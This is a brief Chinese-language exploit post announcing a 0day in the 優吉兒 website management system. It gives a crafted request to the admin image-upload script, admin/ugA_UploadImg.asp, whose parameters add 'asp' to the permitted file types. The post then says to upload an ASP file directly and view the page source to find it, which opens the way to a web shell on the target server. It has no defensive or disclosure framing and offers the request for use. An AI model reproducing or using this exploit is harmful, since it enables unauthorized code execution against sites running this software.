By:黑小子

官方网站 http://www.ugear.com.tw/

優吉兒網站管理系统 ODAY - 脚本漏洞(Scripts Bugs)

Exp:

admin/ugA_UploadImg.asp?
hidfrmN=frmUG&hidtxtN=txtImgPath02&hidImgP=ImgSynLife&hidFileName=&hid
ReName=Y&hidReturn=Y&hidImgSize=400,533,160,120&hidFileSize=&hidImgTyp
e=jpg,jpeg,jpe,asp

直接上传ASP,然后查看源文件。。即可。